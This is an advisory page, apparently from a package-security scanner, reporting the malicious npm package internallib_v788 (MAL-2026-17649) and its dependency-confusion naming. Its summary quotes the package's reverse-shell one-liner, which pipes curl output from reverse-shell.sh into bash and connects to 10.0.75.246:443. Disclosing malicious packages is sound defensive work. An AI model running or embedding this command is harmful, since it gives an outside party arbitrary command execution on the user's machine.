Logo
npm

internallib_v788@1.0.1

Vulnerability report · Last retrieved from osv.dev October 8, 2026 at 7:42 AM UTC

Malicious

OSV ID

MAL-2026-17649

Ecosystem

npm

Summary

internallib_v788 exports a command function in index.js (line 5) that executes /bin/bash -c "curl https://reverse-shell.sh/10.0.75.246:443|sh", fetching a reverse-shell payload from reverse-shell.sh and piping it to a shell. Invoking the exported API opens an interactive reverse shell from the installer's host back to 10.0.75.246:443, giving that endpoint arbitrary command execution on the installer's machine. The package also declares a self-referential dependency on internallib_v788 with an internallib_ naming prefix, matching the structural shape of a dependency-confusion artifact targeting a private internal registry name.

Source: amazon-inspector (59624002e9650beef10d1f87f3f4125405d990d4b58fb8d2178f39b7ff6fb129)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.